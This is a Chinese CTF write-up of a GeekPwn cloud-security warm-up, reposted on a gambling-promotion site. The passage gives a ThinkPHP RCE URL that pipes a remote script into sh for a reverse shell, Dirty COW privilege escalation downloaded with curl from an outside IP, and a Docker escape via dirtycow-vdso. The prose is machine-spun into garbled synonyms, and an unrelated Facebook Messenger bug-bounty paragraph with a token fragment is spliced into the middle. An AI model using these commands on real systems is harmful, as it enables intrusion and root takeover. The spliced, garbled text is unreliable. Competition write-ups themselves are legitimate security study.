GeekPwn 云平安挑战赛之线上热身赛解题历程 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

GeekPwn 云平安挑战赛之线上热身赛解题历程

申博_人物事迹 申博 297次浏览 已收录 0个评论

此次是首个基于实在云平台的云平安挑战赛,全部题目是提权和逃逸的赓续实验,总共有七个题目

竞赛情况掩盖 APP,Docker,KVM 和 Pysical 各个条理,七个题目以下:

条理 义务
web 网页 测试题目一
APP 题目 2(/tmp/flag.lev2.txt)
Docker 题目 3(/root/flag.lev3.txt)
KVM 题目 4(/tmp/flag.lev4.txt)
KVM 题目 5(/root/flag.lev5.txt)
Physical 题目 6(/tmp/flag.lev6.txt)
Physical 题目 7(/root/flag.lev7.txt)

题目请求:

除测试题外,选手置身于一个模仿的云情况中,选手的义务就是从这个唯一的 web 接口,层层渗入,取得更高的权限,用于读取指定的 flag 文件。

web 网页测试题目 1

起首 web 进口的题目的地点是

http://user0022:dcc16fc2@121.12.172.119:30022/public/index.php

翻开后有个 base64 字符串,解码便可获得 flag

APP 题目 2

题目信息:

小明选了黉舍的 web 开辟课程,进修了天下上最好的言语,女朋友想送他一本书作为生日礼物,她以为《Thinking In PHP》不错,惋惜有点贵。选手的义务是帮小明女朋友找到存放在 /tmp/flag.lev2.txt 中的优惠码。

能够晓得题目地点是个 thinkphp 框架;直接 google 查找 thinkphp 破绽,发明

https://learnku.com/articles/21227 的破绽能够胜利应用,应用体式格局以下:

http://121.12.172.119:30022//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= 须要实行的敕令

经由过程这个破绽反弹 shell,EXP 以下:

http://121.12.172.119:30022//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl+https%3A%2F%2Fshell.now.sh%2F154.223.145.173%3A1337+%7C+sh

实行 cat /tmp/flag.lev2.txt 获得 flag:flag{PHP_is_The_best_language_^^5578}

Docker 提权题目 3

题目形貌

小明又选了一门《操作系统设想与道理》的课程,然则小明有个题目一向很迷惑,他辨别不出特权用户和普通用户,选手能帮小明演示一下特权用户吗,比方帮小明读取一下存在 /root/flag.lev3.txt 中的课后功课谜底。

Facebook 赏金$7,500的越权漏洞

Facebook 赏金$7,500的越权漏洞 附件给出了演示视频,可以更清晰的看出渗透测试人员的具体操作 描述 攻击者可以代表Facebook Messenger上的其他用户发送媒体消息,通过在Facebook页面上设置受害者管理员/编辑/主持人,然后攻击者在向某人发送照片/视频/音频时拦截信息的请求,然后将授权标头令牌更改为“Page Token”,将sender_fbid更改为受害者(管理员ID) 前提 这可能允许恶意用户通过在其页面上设置管理员(受害者)身份来代表其他用户发送消息 漏洞复现 首先: 建立两个用户, “Kassem Bazzoun”是攻击者 “Semi Colon” 是被攻击者 “Kassem Bazzoun”在他的页面上使用受害者“Semi Colon”的身份发送内容 拦截请求 攻击者可以在Facebook Messenger(使用Android/IOS)中发送图像/语音/视频时获取这些请求 只需关注Authorization Header 和参数 sender_fbid/to 发送Photos拦截的数据包 POST /messenger_image/3e8cde28c9b2d9112e9c87af9b71fbc56528664348207412316 HTTP/1.1
Authorization: OAuth EAADo1TDZCuu8BAGLOOBcqIqRnGbSHm48FCJdMC4aWuZCrGJJLdwwKrJJt5awRGPiUXGswiwUUTAphk………DgWUkgTUyMBUvs
original_timestamp: 1556554877552
sender_fbid: victim_id

直接运用上面一步反弹 shell 是没法读取 /root/flag.lev3.txt,由于权限不敷。经由过程 whoami 能够看到是 centos 用户,这个环节是须要提权。在服务器 /tmp 目次下下载 linux-exploit-suggester.sh,经由过程实行获得以下信息:

sh ./linux-exploit-suggester.sh
 …….
[+] [CVE-2017-16995] eBPF_verifier
[+] [CVE-2016-5195] dirtycow
[+] [CVE-2016-5195] dirtycow 2

服务器存在脏牛破绽,运用 https://gist.github.com/rverton/e9d4ff65d703a9084e85fa9df083c679 POC。

下载 cowroot.c,在本身的服务器编译

gcc cowroot.c -o cowroot -pthread

然后在 fantanshell 中下载

curl -O http://154.223.145.173:8080/cowroot

运转获得 root 的 shell,从而能够顺遂读取 /root/flag.lev3.txt 文件获得 flag:flag{root_in_the_docker^^1256}

Docker 逃逸题目 4

题目 4 的形貌以下:

小明同砚在取得了 root 权限以后,他以为本身取得了高高在上的权限,异常高兴的在 Linux 的天下中畅游,直到他发明 /root/message 文件中写着这个天下的隐秘。意想到本身只是在容器中嬉戏,小明异常想让选手帮他看一下表面的景致,比方帮小明读取一下存在容器外部 /tmp/flag.lev4.txt 中的隐秘。

读取 /root.message,实在没什么用就是通知你你在 Docker 内里,表面是 KVM 虚拟情况,须要选手逃逸 Docker。

没想到这题也是能够继承用脏牛 POC,https://github.com/scumjr/dirtycow-vdso,即应用 dirtycow 内核破绽修正 vdso,对内核宿主机历程举行 hook,形成 docker 逃逸

在本身的服务器编译好,然后在目的机械实行:

curl http:// 你的服务器 IP/0xdeadbeef -o 0xdeadbeef;chmod +x 0xdeadbeef
./0xdeadbeef 你的服务器 IP: 端口

逃逸以后读取 /tmp/flag.lev4.txt 获得 flag:flag{jump_outsize_of_your_own^^3356}

KVM 提权题目 5

题目形貌:

小明同砚已被选手高明的技术所折服了,决议好好进修,励志处置信息平安行业,然则这时刻交期末大功课的时刻到了,小明实验了屡次照样做不出来。小明异常想让选手帮他读取一下 /root/flag.lev5.txt 中的大功课谜底。

这题本意是想考核提权,然则题目 4 的 Docker 逃逸出来的用户有 root 权限,直接能够检察 /root/flag.lev5.txt 获得 flag:flag{root_is_very_powerfull^^4987}

题目 6 和题目 7 彷佛没有部队做出来,题目 7 应该是个 0day 了。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明GeekPwn 云平安挑战赛之线上热身赛解题历程
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址